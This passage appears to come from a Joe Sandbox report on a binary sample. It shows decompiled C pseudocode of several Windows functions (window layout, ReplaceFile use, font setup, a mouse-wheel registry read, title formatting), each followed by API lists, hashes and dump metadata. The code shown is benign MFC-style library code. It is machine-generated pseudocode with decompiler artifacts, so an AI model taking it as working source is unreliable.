                                            								if(_t285 <= _v56) {
                                            									_t285 = _v56;
                                            								}
                                            								OffsetRect( &_v32, _t285 - _v32.left, _t322);
                                            								_t322 = 0;
                                            								goto L22;
                                            							}
                                            						}
                                            						L71:
                                            						_v16 = _v16 + 1;
                                            					} while (_v16 <  *(_t336 + 0x84));
                                            					_t342 = 0;
                                            					goto L73;
                                            				}
                                            			}

                                            APIs
                                            • IsRectEmpty.USER32 ref: 0041D748
                                            • GetClientRect.USER32 ref: 0041D76D
                                            • BeginDeferWindowPos.USER32 ref: 0041D79D
                                            • GetWindowRect.USER32 ref: 0041D862
                                            • OffsetRect.USER32(?,?,00000000), ref: 0041D894
                                            • OffsetRect.USER32(?,?,00000000), ref: 0041D8CA
                                            • OffsetRect.USER32(?,00000002,00000000), ref: 0041D8EC
                                            • EqualRect.USER32 ref: 0041D921
                                            • OffsetRect.USER32(?,00000000,?), ref: 0041D99B
                                            • OffsetRect.USER32(?,00000000,?), ref: 0041D9CF
                                            • OffsetRect.USER32(?,00000000,?), ref: 0041D9F5
                                            • EqualRect.USER32 ref: 0041DA03
                                            • EndDeferWindowPos.USER32(?), ref: 0041DB48
                                            • SetRectEmpty.USER32(?), ref: 0041DB52
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
                                            • String ID:
                                            • API String ID: 3160784657-0
                                            • Opcode ID: 3854477eee98c4e742db328241d5054ba40e360253ad15e6f1d97d6129b3ec7c
                                            • Instruction ID: 4bc4fb7537ac9ebda1473157cc7a63845d4aad135b3ed423640b2285e9e568f1
                                            • Opcode Fuzzy Hash: 3854477eee98c4e742db328241d5054ba40e360253ad15e6f1d97d6129b3ec7c
                                            • Instruction Fuzzy Hash: 19F1F9B1E0021ADFCF14DFA8D984AEEB7B5FF08305F14816AE516E7251D738A981CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E00418E48(intOrPtr __ecx) {
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t60;
                                            				CHAR* _t61;
                                            				_Unknown_base(*)()* _t67;
                                            				void* _t70;
                                            				CHAR* _t73;
                                            				short* _t79;
                                            				CHAR* _t82;
                                            				short* _t88;
                                            				CHAR* _t91;
                                            				void* _t112;
                                            				long _t114;
                                            				short* _t116;
                                            				intOrPtr _t118;
                                            				int _t122;
                                            				int _t124;
                                            				int _t126;
                                            				void* _t127;
                                            				void* _t129;
                                            				void* _t130;
                                            				short* _t133;
                                            				intOrPtr _t135;
                                            
                                            				E00406520(E00429FEC, _t127);
                                            				_t130 = _t129 - 0x20;
                                            				_t118 = __ecx;
                                            				_push(_t112);
                                            				 *((intOrPtr*)(_t127 - 0x1c)) = __ecx;
                                            				E00416861(_t127 - 0x18, __ecx + 0xc);
                                            				 *(_t127 - 4) = 0;
                                            				E004179D8(_t118, _t112, _t118);
                                            				if( *((intOrPtr*)( *(_t118 + 0x10) - 8)) != 0) {
                                            					_t61 =  *0x436980; // 0x436994
                                            					_t114 = 0;
                                            					 *(_t127 - 0x14) = _t61;
                                            					_t135 =  *0x439c38; // 0x0
                                            					 *(_t127 - 4) = 1;
                                            					if(_t135 != 0) {
                                            						L15:
                                            						E00417B0B( *(_t127 - 0x18));
                                            						goto L16;
                                            					} else {
                                            						_t67 = GetProcAddress(GetModuleHandleA("KERNEL32"), "ReplaceFile");
                                            						_t136 = _t67;
                                            						 *(_t127 - 0x2c) = _t67;
                                            						if(_t67 == 0) {
                                            							goto L15;
                                            						} else {
                                            							_push(0);
                                            							_push( *(_t118 + 0x10));
                                            							_push(_t127 - 0x28);
                                            							_t70 = E00418BE2(_t136);
                                            							_t133 = _t130 + 0xc;
                                            							 *(_t127 - 4) = 2;
                                            							E00416B95(_t127 - 0x14, _t127, _t70);
                                            							_t111 = _t127 - 0x28;
                                            							 *(_t127 - 4) = 1;
                                            							E00416AEC(_t127 - 0x28);
                                            							_t73 =  *(_t127 - 0x14);
                                            							 *(_t127 - 0x10) = _t73;
                                            							if(_t73 != 0) {
                                            								_t122 = lstrlenA(_t73) + 1;
                                            								__eflags = _t122 + _t122 + 0x00000003 & 0x000000fc;
                                            								E00406830(_t122 + _t122 + 0x00000003 & 0x000000fc, _t111);
                                            								_t79 = _t133;
                                            								 *(_t127 - 0x24) = _t79;
                                            								 *_t79 = 0;
                                            								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t79, _t122);
                                            								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
                                            								 *(_t127 - 0x20) =  *(_t127 - 0x24);
                                            							} else {
                                            								 *(_t127 - 0x20) = 0;
                                            							}
                                            							_t82 =  *(_t118 + 0x10);
                                            							 *(_t127 - 0x10) = _t82;
                                            							if(_t82 != 0) {
                                            								_t124 = lstrlenA(_t82) + 1;
                                            								__eflags = _t124 + _t124 + 0x00000003 & 0x000000fc;
                                            								E00406830(_t124 + _t124 + 0x00000003 & 0x000000fc, _t111);
                                            								_t88 = _t133;
                                            								 *(_t127 - 0x24) = _t88;
                                            								 *_t88 = 0;
                                            								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t88, _t124);
                                            								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
                                            							} else {
                                            								 *(_t127 - 0x24) = 0;
                                            							}
                                            							_t91 =  *(_t127 - 0x18);
                                            							 *(_t127 - 0x10) = _t91;
                                            							if(_t91 != 0) {
                                            								_t126 = lstrlenA(_t91) + 1;
                                            								__eflags = _t126 + _t126 + 0x00000003 & 0x000000fc;
                                            								E00406830(_t126 + _t126 + 0x00000003 & 0x000000fc, _t111);
                                            								_t116 = _t133;
                                            								 *_t116 = 0;
                                            								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t116, _t126);
                                            								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
                                            							} else {
                                            								_t116 = 0;
                                            							}
                                            							_push(0);
                                            							_push(0);
                                            							_push(3);
                                            							_push( *(_t127 - 0x20));
                                            							_push( *(_t127 - 0x24));
                                            							_push(_t116);
                                            							if( *(_t127 - 0x2c)() != 0) {
                                            								E00417B0B( *(_t127 - 0x14));
                                            							} else {
                                            								_t114 = GetLastError();
                                            								if(_t114 == 0x498 || _t114 == 0) {
                                            									goto L15;
                                            								}
                                            								L16:
                                            								if(_t114 == 0x499) {
                                            									E00417B0B( *(_t127 - 0x14));
                                            								}
                                            								E00417AE9( *(_t118 + 0x10),  *(_t127 - 0x18));
                                            							}
                                            						}
                                            					}
                                            					 *(_t127 - 4) = 0;
                                            					E00416AEC(_t127 - 0x14);
                                            				}
                                            				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
                                            				_t60 = E00416AEC(_t127 - 0x18);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t127 - 0xc));
                                            				return _t60;
                                            			}

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00418E4D
                                              • Part of subcall function 00416861: InterlockedIncrement.KERNEL32(?), ref: 00416876
                                              • Part of subcall function 004179D8: CloseHandle.KERNEL32(00000001,?,?,0041772F,?,?,004176CD), ref: 004179E7
                                              • Part of subcall function 004179D8: GetLastError.KERNEL32(00000000,0041772F,?,?,004176CD), ref: 00417A0C
                                            • GetModuleHandleA.KERNEL32(KERNEL32,?), ref: 00418EA0
                                            • GetProcAddress.KERNEL32(00000000,ReplaceFile), ref: 00418EAC
                                              • Part of subcall function 00418BE2: __EH_prolog.LIBCMT ref: 00418BE7
                                              • Part of subcall function 00418BE2: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00418C1A
                                              • Part of subcall function 00418BE2: GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 00418C40
                                              • Part of subcall function 00416AEC: InterlockedDecrement.KERNEL32(-000000F4), ref: 00416B00
                                            • lstrlenA.KERNEL32(?), ref: 00418EFD
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 00418F20
                                            • lstrlenA.KERNEL32(?,?,00000001), ref: 00418F3F
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001), ref: 00418F62
                                            • lstrlenA.KERNEL32(?,?,00000001,?,00000001), ref: 00418F80
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001,?,00000001), ref: 00418FA0
                                            • GetLastError.KERNEL32(?,?,?,00000003,00000000,00000000,?,00000001,?,00000001,?,00000001), ref: 00418FBB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWidelstrlen$ErrorH_prologHandleInterlockedLastName$AddressCloseDecrementFileFullIncrementModulePathProcTemp
                                            • String ID: KERNEL32$ReplaceFile
                                            • API String ID: 3306742873-430465611
                                            • Opcode ID: 88258920094b3836d872303bd4dae8ab2e6e518f2c46b2e7802181e9aab17937
                                            • Instruction ID: 35d1a50c5f76602bfe157e4308a6fe3e42fd926e881e06ee79976fcc1b195d94
                                            • Opcode Fuzzy Hash: 88258920094b3836d872303bd4dae8ab2e6e518f2c46b2e7802181e9aab17937
                                            • Instruction Fuzzy Hash: 4B516FB2D00219AFCB10EFA5CC858EFBBB9EF08354B51056EE411B3250DB389E45CB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E00422A19(void* __edi, void* __esi) {
                                            				void* _t28;
                                            				void* _t31;
                                            				void* _t42;
                                            				struct HFONT__* _t50;
                                            				void* _t53;
                                            				void* _t64;
                                            				void* _t65;
                                            				void* _t67;
                                            				void* _t70;
                                            				intOrPtr _t76;
                                            				void* _t77;
                                            				void* _t79;
                                            				void* _t86;
                                            
                                            				_t67 = __esi;
                                            				_t64 = __edi;
                                            				_t28 = E00406520(E0042A954, _t70);
                                            				_t76 =  *0x439c44; // 0x1
                                            				if(_t76 != 0) {
                                            					L21:
                                            					 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
                                            					return _t28;
                                            				}
                                            				E00425F56(0xa);
                                            				_t77 =  *0x439ca4; // 0x0
                                            				if(_t77 == 0) {
                                            					_t53 = LoadBitmapA( *(E00424BFB() + 0xc), 0x7912);
                                            					 *0x439ca4 = _t53;
                                            					if(GetObjectA(_t53, 0x18, _t70 - 0x78) != 0) {
                                            						 *0x439c98 =  *((intOrPtr*)(_t70 - 0x74));
                                            						 *0x439c9c =  *((intOrPtr*)(_t70 - 0x70));
                                            					}
                                            				}
                                            				_t79 =  *0x439ca0; // 0x0
                                            				if(_t79 != 0) {
                                            					L11:
                                            					_push(_t67);
                                            					_push(_t64);
                                            					_push(0);
                                            					E0041A369(_t70 - 0x24, _t82);
                                            					_t31 =  *0x439ca0; // 0x0
                                            					 *(_t70 - 4) = 0;
                                            					if(_t31 == 0) {
                                            						_t65 = 0;
                                            						__eflags = 0;
                                            					} else {
                                            						_t65 = SelectObject( *(_t70 - 0x20), _t31);
                                            					}
                                            					 *((intOrPtr*)(_t70 - 0x10)) = GetTextMetricsA( *(_t70 - 0x1c), _t70 - 0xb0);
                                            					if(_t65 != 0) {
                                            						SelectObject( *(_t70 - 0x20), _t65);
                                            					}
                                            					if( *((intOrPtr*)(_t70 - 0x10)) == 0) {
                                            						L18:
                                            						E0041A89B(0x439ca0);
                                            						goto L19;
                                            					} else {
                                            						_t86 =  *(_t70 - 0xb0) -  *((intOrPtr*)(_t70 - 0xa4)) -  *0x439c9c; // 0x0
                                            						if(_t86 <= 0) {
                                            							L19:
                                            							 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
                                            							E0041A3DB(_t70 - 0x24);
                                            							goto L20;
                                            						}
                                            						goto L18;
                                            					}
                                            				} else {
                                            					E00406330(_t70 - 0x60, 0, 0x3c);
                                            					 *((char*)(_t70 - 0x49)) = 1;
                                            					 *((intOrPtr*)(_t70 - 0x50)) = 0x190;
                                            					_t42 = 1;
                                            					 *(_t70 - 0x60) = _t42 -  *0x439c9c;
                                            					if(GetSystemMetrics(0x2a) == 0) {
                                            						_push("Small Fonts");
                                            					} else {
                                            						_push("Terminal");
                                            					}
                                            					lstrcpyA(_t70 - 0x44, ??);
                                            					if(E0041A6E1(0xf233, _t70 - 0x60) == 0) {
                                            						 *((char*)(_t70 - 0x45)) = 0x20;
                                            					}
                                            					_t50 = CreateFontIndirectA(_t70 - 0x60);
                                            					_t82 = _t50;
                                            					 *0x439ca0 = _t50;
                                            					if(_t50 == 0) {
                                            						L20:
                                            						_t28 = E00425FC6(0xa);
                                            						goto L21;
                                            					} else {
                                            						goto L11;
                                            					}
                                            				}
                                            			}

















                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00422A1E
                                              • Part of subcall function 00425F56: EnterCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425F91
                                              • Part of subcall function 00425F56: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FA3
                                              • Part of subcall function 00425F56: LeaveCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FAC
                                              • Part of subcall function 00425F56: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700), ref: 00425FBE
                                            • LoadBitmapA.USER32 ref: 00422A55
                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 00422A67
                                            • GetSystemMetrics.USER32 ref: 00422AB1
                                            • lstrcpyA.KERNEL32(?,Small Fonts,?,0000000A), ref: 00422ACB
                                            • CreateFontIndirectA.GDI32(?), ref: 00422AEB
                                            • SelectObject.GDI32(?,00000000), ref: 00422B1B
                                            • GetTextMetricsA.GDI32(?,?), ref: 00422B2D
                                            • SelectObject.GDI32(?,00000000), ref: 00422B3E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CriticalSection$Object$EnterMetricsSelect$BitmapCreateFontH_prologIndirectInitializeLeaveLoadSystemTextlstrcpy
                                            • String ID: $Small Fonts$Terminal
                                            • API String ID: 1234877182-3042510724
                                            • Opcode ID: 29564cb59527804121ee2a9ce267bff2e1028d7c4982a5c458cb6d41a7627f25
                                            • Instruction ID: af1173b3a4b80694a70ec61d8b55af463f2ab6573842c533f6f97c7bdcca2de6
                                            • Opcode Fuzzy Hash: 29564cb59527804121ee2a9ce267bff2e1028d7c4982a5c458cb6d41a7627f25
                                            • Instruction Fuzzy Hash: 72417171B00219AFDB20DFA5ED85AAE7BB5FB04344F94013AE505E6191DBB85D01CB29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041ABA7() {
                                            				void* _v8;
                                            				int _v12;
                                            				int _v16;
                                            				char _v144;
                                            				void _t9;
                                            				struct HWND__* _t20;
                                            				void _t21;
                                            				int _t22;
                                            				int _t23;
                                            				int _t27;
                                            				short _t28;
                                            				intOrPtr _t30;
                                            
                                            				_t27 =  *0x437cdc; // 0x0
                                            				if(_t27 != 0) {
                                            					L16:
                                            					_t9 =  *0x439c90; // 0x0
                                            					return _t9;
                                            				}
                                            				_t28 =  *0x439c8c; // 0x0
                                            				 *0x437cdc = 1;
                                            				if(_t28 != 0) {
                                            					L10:
                                            					__eflags =  *0x439c8c - 2;
                                            					if( *0x439c8c != 2) {
                                            						L4:
                                            						_t30 =  *0x439c3c; // 0x1
                                            						 *0x439c90 = 3;
                                            						if(_t30 != 0) {
                                            							__eflags =  *0x439c38; // 0x0
                                            							if(__eflags == 0) {
                                            								SystemParametersInfoA(0x68, 0, 0x439c90, 0);
                                            							}
                                            						} else {
                                            							if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop", 0, 1,  &_v8) == 0) {
                                            								_v12 = 0x80;
                                            								if(RegQueryValueExA(_v8, "WheelScrollLines", 0,  &_v16,  &_v144,  &_v12) == 0) {
                                            									 *0x439c90 = E0040718F( &_v144, 0, 0xa);
                                            								}
                                            								RegCloseKey(_v8);
                                            							}
                                            						}
                                            						goto L16;
                                            					}
                                            					_t20 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                                            					__eflags = _t20;
                                            					if(_t20 == 0) {
                                            						goto L4;
                                            					}
                                            					_t23 =  *0x439c88; // 0x0
                                            					__eflags = _t23;
                                            					if(_t23 == 0) {
                                            						goto L4;
                                            					}
                                            					_t21 = SendMessageA(_t20, _t23, 0, 0);
                                            					 *0x439c90 = _t21;
                                            					return _t21;
                                            				}
                                            				_t22 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
                                            				 *0x439c88 = _t22;
                                            				if(_t22 != 0) {
                                            					 *0x439c8c = 2;
                                            					goto L10;
                                            				} else {
                                            					 *0x439c8c = 1;
                                            					goto L4;
                                            				}
                                            			}
















                                            APIs
                                            • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG), ref: 0041ABDB
                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop,00000000,00000001,?), ref: 0041AC1E
                                            • RegQueryValueExA.ADVAPI32(?,WheelScrollLines,00000000,?,?,?), ref: 0041AC4B
                                            • RegCloseKey.ADVAPI32(?), ref: 0041AC6F
                                            • FindWindowA.USER32 ref: 0041AC98
                                            • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0041ACB8
                                            • SystemParametersInfoA.USER32(00000068,00000000,00439C90,00000000), ref: 0041ACD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MessageWindow$CloseFindInfoOpenParametersQueryRegisterSendSystemValue
                                            • String ID: Control Panel\Desktop$MSH_SCROLL_LINES_MSG$Magellan MSWHEEL$MouseZ$WheelScrollLines
                                            • API String ID: 1228133072-821443377
                                            • Opcode ID: 95f70896755e55a52fc01f3e5765352c2d6134ba5801c03a0d6e533f6f354ec8
                                            • Instruction ID: 5c83e38d2889ea35cb43268cbe58cad34713885164d32870b4297f9966653a84
                                            • Opcode Fuzzy Hash: 95f70896755e55a52fc01f3e5765352c2d6134ba5801c03a0d6e533f6f354ec8
                                            • Instruction Fuzzy Hash: B0216F70A45214ABDB309B51EC49AEB3BB8FB00744F506026E405D2260EBB85DD5DFDE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 89%
                                            			E00421F4E(void* __ecx, CHAR* _a4) {
                                            				char _v520;
                                            				intOrPtr _t36;
                                            				intOrPtr _t45;
                                            				void* _t55;
                                            				void* _t56;
                                            
                                            				_t55 = __ecx;
                                            				if((E00416528(__ecx) & 0x00000040) == 0) {
                                            					lstrcpyA( &_v520,  *(__ecx + 0xac));
                                            					if(_a4 != 0) {
                                            						lstrcatA( &_v520, " - ");
                                            						lstrcatA( &_v520, _a4);
                                            						_t36 =  *((intOrPtr*)(_t55 + 0x40));
                                            						if(_t36 > 0) {
                                            							_push(_t36);
                                            							wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
                                            						}
                                            					}
                                            					L9:
                                            					return E0041A843( *((intOrPtr*)(_t55 + 0x1c)),  &_v520);
                                            				}
                                            				_v520 = _v520 & 0x00000000;
                                            				if(_a4 == 0) {
                                            					L5:
                                            					lstrcatA( &_v520,  *(_t55 + 0xac));
                                            					goto L9;
                                            				}
                                            				lstrcpyA( &_v520, _a4);
                                            				_t45 =  *((intOrPtr*)(_t55 + 0x40));
                                            				if(_t45 > 0) {
                                            					_push(_t45);
                                            					wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
                                            				}
                                            				lstrcatA( &_v520, " - ");
                                            				goto L5;
                                            			}

                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • lstrcpyA.KERNEL32(00000000,00000000), ref: 00421F82
                                            • lstrlenA.KERNEL32(00000000,:%d,?), ref: 00421F9C
                                            • wsprintfA.USER32 ref: 00421FAA
                                            • lstrcatA.KERNEL32(00000000, - ), ref: 00421FBF
                                            • lstrcatA.KERNEL32(00000000,?), ref: 00421FCE
                                            • lstrcpyA.KERNEL32(?,?), ref: 00421FDF
                                            • lstrcatA.KERNEL32(?, - ), ref: 00421FFD
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00422009
                                            • lstrlenA.KERNEL32(?,:%d,?), ref: 0042201F
                                            • wsprintfA.USER32 ref: 0042202D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: lstrcat$lstrcpylstrlenwsprintf$LongWindow
                                            • String ID: - $:%d
                                            • API String ID: 3078587954-2359489159
                                            • Opcode ID: 6d21e6e38d927462feef01ef09ad18ff503edbabfb763a1af246d99f2b2f3c6b
                                            • Instruction ID: ae4adf689d7d90f23104f1149d1543740a665fba2c23219458a983a253b49f06
                                            • Opcode Fuzzy Hash: 6d21e6e38d927462feef01ef09ad18ff503edbabfb763a1af246d99f2b2f3c6b
                                            • Instruction Fuzzy Hash: 5A2123B1A0031EEBCB20ABA5ED4DF8A77ACEF40344F5044A6E615D2151D778E645CF98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E00415B0F(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                            				signed int _v5;
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				struct tagRECT _v28;
                                            				struct tagRECT _v44;
                                            				struct tagRECT _v60;
                                            				struct tagRECT _v80;
                                            				char _v100;
                                            				intOrPtr _t55;
                                            				struct HWND__* _t56;
                                            				intOrPtr _t78;
                                            				intOrPtr _t90;
                                            				signed int _t99;
                                            				struct HWND__* _t100;
                                            				struct HWND__* _t102;
                                            				void* _t104;
                                            				long _t110;
                                            				void* _t113;
                                            				struct HWND__* _t115;
                                            				void* _t117;
                                            				intOrPtr _t119;
                                            				intOrPtr _t123;
                                            
                                            				_t113 = __edx;
                                            				_t119 = __ecx;
                                            				_v12 = __ecx;
                                            				_v8 = E00416528(__ecx);
                                            				_t55 = _a4;
                                            				if(_t55 == 0) {
                                            					if((_v5 & 0x00000040) == 0) {
                                            						_t56 = GetWindow( *(__ecx + 0x1c), 4);
                                            					} else {
                                            						_t56 = GetParent( *(__ecx + 0x1c));
                                            					}
                                            					_t115 = _t56;
                                            					if(_t115 != 0) {
                                            						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
                                            						if(_t100 != 0) {
                                            							_t115 = _t100;
                                            						}
                                            					}
                                            				} else {
                                            					_t115 =  *(_t55 + 0x1c);
                                            				}
                                            				GetWindowRect( *(_t119 + 0x1c),  &_v44);
                                            				if((_v5 & 0x00000040) != 0) {
                                            					_t102 = GetParent( *(_t119 + 0x1c));
                                            					GetClientRect(_t102,  &_v28);
                                            					GetClientRect(_t115,  &_v60);
                                            					MapWindowPoints(_t115, _t102,  &_v60, 2);
                                            				} else {
                                            					if(_t115 != 0) {
                                            						_t99 = GetWindowLongA(_t115, 0xfffffff0);
                                            						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
                                            							_t115 = 0;
                                            						}
                                            					}
                                            					_v100 = 0x28;
                                            					if(_t115 != 0) {
                                            						GetWindowRect(_t115,  &_v60);
                                            						E00404F6B(E00404F00(_t115, 2),  &_v100);
                                            						CopyRect( &_v28,  &_v80);
                                            					} else {
                                            						_t90 = E00404DAE();
                                            						if(_t90 != 0) {
                                            							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
                                            						}
                                            						E00404F6B(E00404F00(_t90, 1),  &_v100);
                                            						CopyRect( &_v60,  &_v80);
                                            						CopyRect( &_v28,  &_v80);
                                            					}
                                            				}
                                            				_t117 = _v44.right - _v44.left;
                                            				asm("cdq");
                                            				_t104 = _v44.bottom - _v44.top;
                                            				asm("cdq");
                                            				_t114 = _v60.bottom;
                                            				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
                                            				asm("cdq");
                                            				asm("cdq");
                                            				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
                                            				if(_t110 >= _v28.left) {
                                            					_t78 = _v28.right;
                                            					if(_t117 + _t110 > _t78) {
                                            						_t110 = _t78 - _v44.right + _v44.left;
                                            					}
                                            				} else {
                                            					_t110 = _v28.left;
                                            				}
                                            				if(_t123 >= _v28.top) {
                                            					if(_t104 + _t123 > _v28.bottom) {
                                            						_t123 = _v44.top - _v44.bottom + _v28.bottom;
                                            					}
                                            				} else {
                                            					_t123 = _v28.top;
                                            				}
                                            				return E0041663D(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
                                            			}

                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • GetParent.USER32(?), ref: 00415B3A
                                            • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00415B5D
                                            • GetWindowRect.USER32 ref: 00415B76
                                            • GetWindowLongA.USER32 ref: 00415B89
                                            • CopyRect.USER32 ref: 00415BD6
                                            • CopyRect.USER32 ref: 00415BE0
                                            • GetWindowRect.USER32 ref: 00415BE9
                                            • CopyRect.USER32 ref: 00415C05
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Rect$Window$Copy$Long$MessageParentSend
                                            • String ID:
                                            • API String ID: 808654186-0
                                            • Opcode ID: 08e789acf66eab3a19b7e86daab60fd72cfb8a595c4ec189871ddf3cd5da10ba
                                            • Instruction ID: 84b52a2fdf36364977305fff30e360f87450067914530d6a9d7fdd5b83c17d5a
                                            • Opcode Fuzzy Hash: 08e789acf66eab3a19b7e86daab60fd72cfb8a595c4ec189871ddf3cd5da10ba
                                            • Instruction Fuzzy Hash: A4517571A04619AFCB10DFA8DC85EEEBBB9AF84314F154125E501F3291D734B9468B98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 97%
